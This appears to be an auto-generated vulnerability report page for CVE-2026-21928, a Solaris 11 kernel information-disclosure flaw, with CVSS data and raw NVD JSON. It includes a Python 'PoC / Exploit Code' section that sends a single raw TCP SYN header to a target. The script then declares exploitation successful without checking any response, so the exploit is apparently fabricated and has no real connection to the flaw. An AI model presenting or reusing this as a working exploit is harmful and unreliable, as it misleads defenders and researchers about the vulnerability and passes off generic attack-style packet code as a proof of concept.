Security Vulnerability Report
中文
CVE-2026-21928 CVSS 5.3 MEDIUM

CVE-2026-21928

Published: 2026-01-20 22:15:55
Last Modified: 2026-03-03 16:16:20
Source: [email protected]

Description

Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via TCP to compromise Oracle Solaris. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Solaris accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:oracle:solaris:11:*:*:*:*:*:*:* - VULNERABLE
Oracle Solaris 11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-21928 PoC - Oracle Solaris Kernel Information Disclosure # This PoC demonstrates network-based information disclosure attempt # Note: This is for authorized security testing only import socket import struct import sys def create_tcp_probe_packet(target_ip, target_port): """ Create a probe packet targeting Oracle Solaris kernel This simulates the network request that triggers the vulnerability """ # TCP header structure src_port = 44444 dst_port = target_port seq_num = 0 ack_num = 0 data_offset = 5 # 20 bytes header flags = 0x02 # SYN flag window = 65535 checksum = 0 urgent_ptr = 0 tcp_header = struct.pack('!HHLLBBHHH', src_port, dst_port, seq_num, ack_num, (data_offset << 4), flags, window, checksum, urgent_ptr) return tcp_header def exploit_cve_2026_21928(target_ip, target_port=0): """ Attempt to trigger CVE-2026-21928 information disclosure Args: target_ip: Target Oracle Solaris system IP address target_port: Target port (typically 0 for raw socket) Returns: bool: True if exploitation appears successful """ print(f"[*] Targeting Oracle Solaris system: {target_ip}") print(f"[*] Attempting to trigger CVE-2026-21928...") try: # Create raw socket sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP) sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) # Create probe packet packet = create_tcp_probe_packet(target_ip, target_port) # Send packet sock.sendto(packet, (target_ip, target_port)) sock.close() print(f"[+] Probe packet sent successfully") print(f"[!] Note: This is an information disclosure vulnerability") print(f"[!] Successful exploitation may reveal kernel memory or system data") return True except PermissionError: print(f"[-] Error: Root privileges required for raw socket operations") return False except Exception as e: print(f"[-] Error: {str(e)}") return False def main(): if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [target_port]") print(f"Example: {sys.argv[0]} 192.168.1.100 0") sys.exit(1) target_ip = sys.argv[1] target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 0 exploit_cve_2026_21928(target_ip, target_port) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21928", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:15:55.303", "lastModified": "2026-03-03T16:16:20.373", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via TCP to compromise Oracle Solaris. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Solaris accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)."}, {"lang": "es", "value": "Vulnerabilidad en el producto Oracle Solaris de Oracle Systems (componente: Kernel). La versión compatible que se ve afectada es la 11. Vulnerabilidad fácilmente explotable permite a un atacante no autenticado con acceso a la red a través de TCP comprometer Oracle Solaris. Ataques exitosos de esta vulnerabilidad pueden resultar en acceso de lectura no autorizado a un subconjunto de datos accesibles de Oracle Solaris. Puntuación base CVSS 3.1 de 5.3 (Impactos en la confidencialidad). Vector CVSS: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:oracle:solaris:11:*:*:*:*:*:*:*", "matchCriteriaId": "8E8C192B-8044-4BF9-9F1F-57371FC0E8FD"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.